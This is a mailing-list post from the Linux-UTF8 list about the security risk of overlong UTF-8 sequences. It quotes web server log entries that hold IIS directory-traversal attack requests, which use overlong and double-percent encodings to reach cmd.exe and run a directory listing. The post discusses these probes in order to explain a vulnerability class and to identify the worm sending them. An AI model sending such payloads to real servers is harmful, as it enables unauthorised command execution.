Security

[Markus Kuhn <Markus.Kuhn@xxxxxxxxxxxx>]

For those of you still wondering what I was worried about a few years
ago with regard to overlong UTF-8 sequences, here some extract from our
httpd log files:

...
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0
...

Looks familiar? :)

Markus

P.S.: Has anyone an idea, which IIS worm performs the above
HTTP vulnerability tests? Is it one of the later Nimda variants
or something else?

-- 
Markus G. Kuhn, Computer Laboratory, University of Cambridge, UK
Email: mkuhn at acm.org,  WWW: <http://www.cl.cam.ac.uk/~mgk25/>

--
Linux-UTF8:   i18n of Linux on all levels
Archive:      http://mail.nl.linux.org/linux-utf8/